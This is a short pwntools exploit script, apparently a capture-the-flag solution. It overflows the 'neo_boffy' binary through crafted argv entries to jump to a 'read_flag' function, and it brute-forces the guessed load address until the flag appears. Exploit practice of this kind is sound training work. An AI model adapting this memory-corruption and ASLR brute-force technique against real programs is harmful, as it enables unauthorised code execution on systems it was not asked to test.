  1. from pwn import *
  2.  
bin_path = "./neo_boffy"  # target binary; spawned once per attempt in the retry loop below

# Silence pwntools' per-process console output: the retry loop spawns many
# binaries and the default logging would flood the terminal.
context.log_level = "ERROR"
  7.  
# Can't send NUL bytes inside an argument, but can send empty strings
def cmdify(str):
    """Split a payload string on NUL bytes into a list of argv entries.

    Every NUL ends one argument, so consecutive NULs produce empty strings
    (that is how an empty argument is passed). The parameter is named
    ``str`` in the original and shadows the builtin; it is kept unchanged
    so the existing positional caller keeps working.
    """
    separator = "\x00"
    return str.split(separator)
  10.  
  11.  
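read_flag_offset = 0x8d0
# No ASLR leak is available, so the load base is hard-coded as a guess and
# the retry loop below keeps spawning the target until the guess is right.
read_flag = 0x565ee000 + read_flag_offset
loop_cap = 0x78  # This is where the loop caps

payload = ""
payload += "\x00" * 3  # three NULs -> three empty argv strings after cmdify(); keeps the loop going
payload += p32(read_flag)  # read_flag packed as a 4-byte value (pwntools p32)
payload += chr(loop_cap - 1 - len(payload))  # one byte holding loop_cap - 1 - current length
payload = payload.rjust(0x79, "A")  # left-pad with "A" to a total of 0x79 bytes

# Keep trying until we find it: each attempt spawns a fresh process, reads
# its output until EOF and checks for the flag marker.
while True:
    p = process([bin_path] + cmdify(payload))
    try:
        out = p.recvall()
    finally:
        # Close the tube on every iteration. The original relied on garbage
        # collection, which leaks pipes/file descriptors over many spawns.
        p.close()
    if "CTF{" in out:
        print(out)
        break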